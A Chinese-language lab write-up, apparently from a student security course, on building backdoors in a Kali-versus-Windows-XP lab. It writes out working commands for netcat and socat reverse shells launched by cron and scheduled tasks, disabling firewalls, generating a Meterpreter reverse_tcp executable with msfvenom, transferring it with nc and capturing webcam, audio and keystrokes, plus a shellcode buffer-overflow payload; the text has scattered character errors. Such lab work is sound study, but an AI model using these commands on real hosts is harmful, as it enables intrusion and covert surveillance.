使用 netcat 获取主机操做 Shell,cron 启动shell
使用 socat 获取主机操做 Shell, 任务计划启动vim
使用 MSF meterpreter 生成可执行文件,利用 ncat 传送到主机并运行获取主机 Shell
windows
使用 MSF meterpreter 生成获取目标主机音频、摄像头、击键记录,并尝试提权tcp
浏览挂马网页性能
下载恶意软件编码
打开可疑优盘spa
修改注册表项,开机自启动命令行
设定启动周期,定时启动3d
开启监听,知足特定条件后反弹启动调试
能够简化任务建立多个会话
工做模式是纯内存的,难以监测,不留痕迹
跟踪可疑进程
检查注册表项
更新病毒库并及时查看杀毒软件的提示信息
实验用 Win 选择 XP 系统
下载 netcat 并解压,关闭防火墙
kali 关闭防火墙
ufw disable
windows 打开监听
查看 windows IP
ipconfig
在 kali 环境下使用 vim 编写定时任务
crontab -e
将编写格式 mark 以下
3 月 23 日 21 时 33 分反弹链接,发送 shell
xp 得到 kali shell
windows 添加计划任务
开始→控制面板→性能和维护→计划任务→添加计划任务
涉及到组策略调整或用户密码设置
添加参数,重定向命令行
kali 链接
出现乱码的缘由是两者使用不一样的中文编码方式
查看 kali IP
ifconfig
使用 meterpreter 生成后门程序
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.176.130 LPORT=4306 -f exe > 20164306.exe
kali 向本地端口发送文件
nc -l 4306 < 20164306.exe
windows 从 kali 处接收文件
nc.exe 192.168.176.131 4306 > 20164306.exe
进入 msfconsole 进行相关设置
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set LHOST 192.168.176.130 set LPORT 4306
开启监听
exploit
运行 Windows 上的后门程序后,kali 获得了控制权
控制摄像头的相关指令,通常状况下,使用前首先使用 list 检查是否有可用设备
获取音频截屏键盘记录提权啥的相似输指令浪就完事了,如下是实验结果
除了实验中尝试的后门实现方法,网页后门、帐号后门、C/S后门也是经常使用的攻击手段
实际生活中用于搜集信息的一些反馈错误程序、调查提交程序实质上与后门无异,它们会控制主机自动链接其它设备并进行数据交互
咱们须要认识到后门的危险性,积极防范,警戒上述程序被攻击者利用
在 kali 环境下实验,经过不一样终端操做,攻击者、靶机 ip 地址相同(我连我本身)
实验用 pwn3 为 pwn1 的备份文件,修改权限为 777,关闭地址随机化,开启堆栈可执行(详见 Exp1)
MSF 关键参数 mark
生成 shellcode,规避 “\x00\x0a” ,以 c 的形式输出到文件 shellcode 中(-o)
规范格式,去除文件中的引号、回车等字符,以便构造 payload
构造 payload 并输出到 shellcode 文件中,内容为上述字符串补 32 个 A 和一串 \x90,地址待定
调试,肯定返回地址
在另外一个终端里 gdb(详见 Exp1)
将对应的 \x90 替换为具体地址(落在nop区任意位置便可)
此时payload构造完成,打开新终端模拟攻击者,进入控制台完成配置并开启监听
运行 pwn3 ,注入 payload,链接成功!